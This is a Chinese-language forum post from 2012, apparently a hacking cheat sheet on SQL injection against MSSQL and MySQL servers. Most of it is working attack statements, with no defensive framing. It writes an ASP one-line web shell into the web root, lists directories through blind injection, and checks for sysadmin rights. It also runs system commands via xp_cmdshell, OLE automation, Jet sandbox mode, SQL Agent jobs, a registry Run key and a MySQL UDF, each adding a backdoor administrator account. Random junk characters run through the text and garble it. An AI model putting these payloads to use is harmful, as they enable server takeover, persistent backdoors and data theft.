MSSQL语句导出一句话木马
/ y; K7 C0 T5 |8 U8 `首先确定网站的WEB路径7 w" e8 D$ L( L2 \* h2 L& _8 Y! e( L
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马 k0 v$ _4 p& C% t6 U
: L3 {* C+ Y7 y% ^0 }
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 2 A+ X+ M6 a( J; Q- P) M. R2 v4 p
//将一句话木马插入表中
" H$ h( \& i6 P( `, c, v, b1 |- }& b6 i
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- A2 P$ x- t5 B1 q) i( z7 h# d
//导出一个ASP文件9 H+ z" N! c* n! t0 r! e, E4 z
" X3 l& L v0 ~) j4 ~! I" m* J" B& S/ s! Y, s9 Z* L; w4 x& [
关于MSSQL列目录* z2 y+ x! x$ G- j
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表/ h: K" j5 z s# L, z; a2 O
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表$ ~3 N3 K6 b) f" r, J
1 A' I6 d; B/ U ]# T! a8 O7 Gand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录; V2 C- n: F) \" }* Z
, W4 U" \; ~3 J" ?: a/ AAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
1 `/ s* S; h }% v4 z+ x1 t6 q4 X, X" O; m% ^. X$ v
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
3 J3 [! T& a, C1 e- s' L
1 P+ O. J, X% K. W; U5 M5 T' J( r3 \
数据库版本和权限查看3 u& i/ e1 t& q$ i( H% m7 C
and 1=(select @@VERSION) //查看详细的数据库信息.
, n3 G% q6 u0 W z$ B. Gand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
$ k5 ^; U5 f# o9 b% K* a( b9 pand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER( r# r1 E7 i/ W$ W8 s/ }
+ \+ ~6 y0 u1 D9 S- p
1 M$ ?: r5 [# z& z: y |8 H1.利用xp_cmdshell执行命令# k( ]% U" k" L& Z; C
exec master..xp_cmdshell 'net user rfire 123456 /add'
8 Y9 ?7 J7 }4 r: H! S% e, \exec master..xp_cmdshell 'net localgroup administrators rfire /add'7 r$ Z' B0 d9 l( G3 u" I6 o
& x8 w; {" @9 Z4 F6 G8 ]
恢复xp_cmdshell存储过程
1 S8 S4 K6 b4 d5 L3 g+ vExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 I9 [# Z2 [+ ]/ o3 x
( [5 v# k# A; f" C: o+ J
7 Y$ _9 ] z3 P& y- G6 o$ N% _
2.利用SP_OAcreate和SP_OAMETHOD执行命令6 [. J8 |; _/ r4 N6 N8 @' y' J
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
+ v) A. G1 z" ^: s/ _+ SDECLARE @shell INT //建立一个@shell实体+ m! G4 h6 B- {* Z
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例- u& S4 E {" O9 i1 m
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
; p' L" X2 ^& V" ]' S/ f/ X) }6 d: S/ E. h2 o& g$ T6 `
0 |0 M7 _' }- j/ ~1 q3.利用沙盒模式
, z/ W% w2 {% ?, B先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
7 N( g( G% v! \& `7 J开启沙盒模式:) q8 j0 o/ i1 j1 F; Y3 H2 c
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
9 T. H# _7 d3 K6 Z5 e4 k( N% g) o4 V; V) }( B5 n A! r
执行命令:; }% t: v) x( |, _, i9 g4 K
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
) \+ b; V- H7 {- j J3 ~
! D9 J$ x% I6 }0 N, X7 c% ]( w( e+ B3 ]$ |
4.利用SQL代理执行命令' c" D% {' k+ c1 f
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务! N9 v3 F F8 |9 o' A
! I( k# Y6 @/ w: s2 \执行命令:
. A) G& [3 e# P1 M3 Zuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
3 F, W- S0 y% sexec sp_add_job 'x': z) ]! V4 e- T5 J; Q' L( Q
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
0 I* _+ Q4 X8 d9 P) aexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
2 G1 J) _8 o: X9 C; {. m/ g& \" Q9 W
+ ?9 X- J: O* ~1 l
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
" d$ l; |$ D2 REXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'4 A: T& Q$ Y' @' K, m l
* k4 M; w ?; |9 _9 S/ u* b' }) J, s2 i: Q
6.MYSQL的命令执行* g* X, M. c8 P4 O% Y1 J: z' b4 u
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)9 W; @& N+ W$ I& h. H
首先要在su.php下导出c:\windows\udf.dll# [- f' F |+ N- j% n
导出后执行创建自定义函数命令:" \3 M/ G; w" H/ D4 o+ U0 m
Create Function cmdshell returns string soname 'udf.dll'
# O" p* b# u* {* O/ f3 f7 D执行命令' r" h/ X/ ?6 E# S; }
select cmdshell('net user rfire 123456 /add')9 E! _& _& \: p: E, d& z# h
执行后删除函数 drop function cmdshell
# W5 H9 h* ~1 |; x3 K, M |
发表于 2012-9-13 17:49:59
收藏
支持
反对